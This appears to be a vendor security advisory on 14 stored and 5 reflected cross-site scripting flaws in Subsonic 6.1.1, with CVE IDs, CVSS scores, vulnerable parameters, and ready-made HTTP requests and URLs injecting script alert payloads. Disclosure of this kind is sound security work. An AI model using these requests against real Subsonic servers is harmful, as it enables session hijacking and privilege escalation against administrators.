Subsonic is an open source web media server that enables the management of media resources such as music or videos. Its official website is www.subsonic.org. The version affected by the identified vulnerabilities is 6.1.1, released May 31, 2017.
Two types of cross-site scripting were identified within the Subsonic application:
These vulnerabilities are described in the following sections.
Version 6.1.1
The Subsonic application is affected by 14 stored cross-site scripting (XSS) instances that are stored within different application features. These vulnerabilities enable the injection of a JavaScript payload inside a vulnerable page that will then be executed each time a user visits it. The vulnerabilities could be exploited with authenticated users and used to target administrators and steal their sessions.
CVE ID: CVE-2018-9282, CVE-2018-14688, CVE-2018-14689, CVE-2018-14690, CVE-2018-14691
Access Vector: Remote
Security Risk: Critical
Vulnerability: CWE-79
CVSS Base Score: 9.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
The podcast subscription form is affected by one stored cross-site scripting instance. No administrator access is required to exploit this instance. By injecting a JavaScript payload into the form, an attacker can manipulate user sessions or elevate privileges by targeting an administrative user. The weak parameter is add. The following payload can be used to inject code and verify the vulnerability:
<script>alert(/XSS/)</script>
The request below can be used to exploit the instances:
POST /podcastReceiverAdmin.view? HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2
add=http%3A%2F%2F%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
The music tags setting form is affected by three stored XSS instances. No administrator access is required to exploit these instances, but tag modification permission is required. By injecting a JavaScript payload into the form, an attacker can manipulate user sessions or elevate privileges by targeting an administrative user. The weak parameter is c0-param2, c0-param3, and c0-param4. The following payload can be used to inject code and verify the vulnerability:
“><script>alert(/XSS/)</script>
The request below could be used to exploit the instances:
POST /dwr/call/plaincall/tagService.setTags.dwr HTTP/1.1
Host: 192.168.1.36:4040
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2
callCount=1
nextReverseAjaxIndex=0
c0-scriptName=tagService
c0-methodName=setTags
c0-id=0
c0-param0=string:65
c0-param1=string:1
c0-param2=string:%22%3E%3Cscript%3Ealert(%2FXSS1%2F)%3C%2Fscript%3E
c0-param3=string:%22%3E%3Cscript%3Ealert(%2FXSS2%2F)%3C%2Fscript%3E
c0-param4=string:%22%3E%3Cscript%3Ealert(%2FXSS3%2F)%3C%2Fscript%3E
c0-param5=string:
c0-param6=string:Bastard%20Pop
batchId=0
instanceId=0
page=%2FeditTags.view%3Fid%3D8
scriptSessionId=SESSIONID2
The internet radio settings form is affected by three stored XSS instances. Administrator access is required to exploit these instances. By injecting JavaScript payload into the form, an attacker can manipulate user sessions. The weak parameter is is name[x], streamUrl[x], homepageUrl[x] where x is an integer. The following payload can be used to inject code and verify the vulnerability:
<script>alert(/XSS/)</script>
The request below could be used to exploit the instances:
POST /internetRadioSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2
name%5B1%5D=%22%3Etest%22%3Cscript%3Ealert%28%2Fradioname%2F%29%3C%2Fscript%3E&streamUrl%5B1%5D=%22%3Etest%22%3Cscript%3Ealert%28%2Fradiostreamurl%2F%29%3C%2Fscript%3E&homepageUrl%5B1%5D=%22%3E%22%3Cscript%3Ealert%28%2Fradiohomepage%2F%29%3C%2Fscript%3E&enabled%5B1%5D=on&name=&streamUrl=&homepageUrl=&enabled=on
The general settings form is affected by two stored XSS instances. Administrator access is required to exploit these instances. By injecting a JavaScript payload, an attacker can manipulate user sessions. The weak parameters are title and subtitle. The following payload can be used to inject code and verify the instances:
<script>alert(/XSS/)</script>
The request below could be used to exploit the instances:
POST /generalSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2
musicFileTypes=mp3+ogg+oga+aac+m4a+flac+wav+wma+aif+aiff+ape+mpc+shn&videoFileTypes=flv+avi+mpg+mpeg+mp4+m4v+mkv+mov+wmv+ogv+divx+m2ts&coverArtFileTypes=cover.jpg+cover.png+cover.gif+folder.jpg+jpg+jpeg+gif+png&playlistFolder=%2Fvar%2Fplaylists&index=A+B+C+D+E+F+G+H+I+J+K+L+M+N+O+P+Q+R+S+T+U+V+W+X-Z%28XYZ%29&ignoredArticles=The+El+La+Los+Las+Le+Les&shortcuts=New+Incoming+Podcast&localeIndex=0&themeIndex=0&sortAlbumsByYear=true&_sortAlbumsByYear=on&_gettingStartedEnabled=on&welcomeTitle=Welcome+to+Subsonic%21%22%3E%3Cscript%3Ealert%28%2Fwelcometitle%2F%29%3C%2Fscript%3E&welcomeSubtitle=%22%3E%3Cscript%3Ealert%28%2Fwelcomesubtitle%2F%29%3C%2Fscript%3E&welcomeMessage=Welcome+to+Subsonic%21%0D%0A%5C%5C+%5C%5C%0D%0ASubsonic+is+a+free%2C+web-based+media+streamer%2C+providing+ubiquitous+access+to+your+music.+%0D%0A%5C%5C+%5C%5C%0D%0AUse+it+to+share+your+music+with+friends%2C+or+to+listen+to+your+own+music+while+at+work.+You+can+stream+to+multiple+players+simultaneously%2C+for+instance+to+one+player+in+your+kitchen+and+another+in+your+living+room.%0D%0A%5C%5C+%5C%5C%0D%0ATo+change+or+remove+this+message%2C+log+in+with+administrator+rights+and+go+to+%7Blink%3ASettings+%3E+General%7CgeneralSettings.view%7D.%0D%0A&loginMessage=
The transcoding settings form is affected by five stored XSS instances. Administrator access is required to exploit these instances. By injecting a JavaScript payload, an attacker could manipulate user sessions. The weak parameters are name[x], sourceformats[x], targetFormat[x], step1[x], and step2[x] where x is an integer. The following payload can be used to inject code and verify the instances:
<script>alert(/XSS/)</script>
The request below could be used to exploit the instances:
POST /transcodingSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2
name%5B0%5D=mp3+audio&sourceFormats%5B0%5D=ogg+oga+aac+m4a+flac+wav+wma+aif+aiff+ape+mpc+shn&targetFormat%5B0%5D=mp3&step1%5B0%5D=ffmpeg+-i+%25s+-map+0%3A0+-b%3Aa+%25bk+-v+0+-f+mp3+-&step2%5B0%5D=&name%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fname%2F%29%3C%2Fscript%3E&sourceFormats%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fconvertfrom%2F%29%3C%2Fscript%3E&targetFormat%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fconvertto%2F%29%3C%2Fscript%3E&step1%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fstep1%2F%29%3C%2Fscript%3E&step2%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fstep2%2F%29%3C%2Fscript%3E&name=&sourceFormats=&targetFormat=&step1=&step2=&defaultActive=on&downsampleCommand=ffmpeg+-i+%25s+-map+0%3A0+-b%3Aa+%25bk+-v+0+-f+mp3+-
The Subsonic application is affected by five reflected cross-site scripting (XSS) instances that require user interaction to be executed.
CVE ID: CVE-2018-14687, CVE-2018-14689, CVE-2018-14692
Access Vector: Remote
Security Risk: High
Vulnerability: CWE-352
CVSS Base Score: 8.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
The personal player settings form is affected by three cross-site scripting instances. By injecting JavaScript payload into the vulnerable parameters, an attacker could use this page to manipulate the user session. Weak parameters are clone, id and technologyName. To inject code and verify the flaw the following payload could be used:
<script>alert(/XSS/)</script>
The request below could be used to exploit the instances:
http://HOST/playerSettings.view?clone=%3cscript%3ealert(/XSS/)%3c%2fscript%3e
http://HOST/playerSettings.view?id=%3cscript%3ealert(/XSS/)%3c%2fscript%3e
POST /playerSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2
playerId=3&technologyName=JUKEBOX%3cscript%3ealert(/XSS/)%3c%2fscript%3e&name=test&transcodeSchemeName=OFF&dynamicIp=true&_dynamicIp=on&autoControlEnabled=true&_autoControlEnabled=on&activeTranscodingIds=0&_activeTranscodingIds=on
The stream page is affected by one cross-site scripting instance. By injecting a JavaScript payload into the vulnerable parameters, an attacker can use this page to manipulate user sessions. The weak parameter is player. The following payload can be used to inject code and verify the instance:
<script>alert(/XSS/)</script>
The request below could be used to exploit the instance:
http://HOST/stream?player=%3Cscript%3Ealert(/XSS/)%3C/script%3E&id=79&auth=1289324648&suffix=.mp3
The network settings form is affected by one cross-site scripting instance. By injecting a JavaScript payload into the vulnerable parameter, an attacker can use this form to manipulate user sessions. The weak parameter is urlRedirectingType. The following payload can be used to inject code and verify the instance:
<script>alert(/XSS/)</script>
The request below can be used to exploit the instance:
POST /networkSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2
_portForwardingEnabled=on&urlRedirectionEnabled=true&_urlRedirectionEnabled=on&urlRedirectType=CUSTOM%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&urlRedirectCustomUrl=http%3A%2F%2Ftest
Florian Nivette, Security Associate at Bishop Fox
8240 S. Kyrene Rd.
Suite A113
Tempe, AZ
85284
United States
